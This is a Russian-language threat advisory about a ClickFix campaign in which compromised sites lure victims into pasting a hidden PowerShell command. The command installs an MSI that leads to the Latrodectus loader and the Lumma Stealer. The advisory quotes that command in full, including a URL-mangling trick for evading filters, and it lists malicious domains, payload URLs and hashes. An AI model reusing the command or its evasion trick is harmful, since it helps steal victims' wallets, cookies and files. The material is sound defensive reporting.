Злоумышленники активно используют технику ClickFix, при которой жертвы перенаправляются с легитимных, но скомпрометированных сайтов на вредоносные страницы. Там пользователям предлагают скопировать и выполнить PowerShell-скрипт, маскирующийся под решение технической проблемы. В новой волне атак этот метод приводит к загрузке Lumma Stealer — трояна-похитителя данных.
Описание
Атака начинается с того, что жертва попадает на фальшивую веб-страницу, где ей предлагают вставить специальный код в окно выполнения команд (Win + R). Пример такого скрипта включает вызов PowerShell с скрытым выполнением кода, который загружает .msi-установщик с поддельного домена. Интересно, что злоумышленники намеренно искажают URL, например, пишут «htps://» вместо «https://», а затем исправляют это с помощью метода .Insert(2,'t'), чтобы обойти простые фильтры безопасности.
| 1 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$i=New-Object -ComObject WindowsInstaller.Installer;$i.UILevel=2;$u='htps://thob[.]live/'.Insert(2,'t');$i.InstallProduct($u,'')" |
После выполнения скрипта в память системы загружается .msi-файл, который, в свою очередь, распаковывает два компонента: легитимный EXE-файл для маскировки и вредоносную DLL, используемую для техники DLL side-loading. Эта DLL связана с загрузчиком Latroductus (также известным как Blackwidow), который проверяет систему на наличие анализа, загружает дополнительные модули и подготавливает почву для основной вредоносной нагрузки.
Финальным этапом атаки становится загрузка трояна Lumma Stealer, специализирующегося на краже конфиденциальных данных. Этот вредонос собирает криптовалютные кошельки (например, MetaMask и Exodus), cookies и сессии браузеров, данные автозаполнения, а также важные файлы из системных папок.
ClickFix остается опасным вектором атак, и злоумышленники постоянно совершенствуют свои методы. Осведомленность и многоуровневая защита — ключевые факторы противодействия таким угрозам.
Индикаторы компрометации
IPv4
- 141.94.53.219
Domains
- architrata.com
- atri.live
- b.ekoz.live
- carflotyup.com
- cqsf.live
- dlux.live
- furthert.run
- jrxsafer.top
- lofiramegi.com
- m.bjeb.live
- plantainklj.run
- puerrogfh.live
- quavabvc.top
- quityt.digital
- rambutanvcx.run
- rekx.live
- steamcommunity.com
- targett.top
- thob.live
- topguningit.com
- ywmedici.top
URLs
- http://141.94.53.219/2/123.exe
- http://141.94.53.219/3/0.exe
- http://141.94.53.219/3/or2.dll
- https://smartlifeshift.com/share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exe
SHA256
- 146affbf12b8998f04fa2daf5e5e7bcc6b535e2097cbd541c690b3eca7d8e03b
- 391c964bd8df38ac4f024fff99528182f17fbd8e30fca43272f6812c34fa53b7
- 5070cc64b72062e18baa2ba164e1fef9d9a57a9962a64738d8405cd8c3af5101
- 6c94c9d7e231523e06b41275ab208e42cdd39278f341123b066b05a0a6830e4d
- 8502cabd12fa8c56c5ab62bdbb714592d0e4452efa025cf558de0a9e7605ad43
- 94479572d99e07c50d39c46c8a96843e1c8ae80ce126ae3ba4c4fd223e3d731a
- 9d851620712c8122ee50d25723800ef2ecfb6bd7f810f0a1909b5f5808d8055f
- a399bf56687bc04707fc1cc7771725f500d5d70d4fcdfbc3462d6b1ff37b8a9d
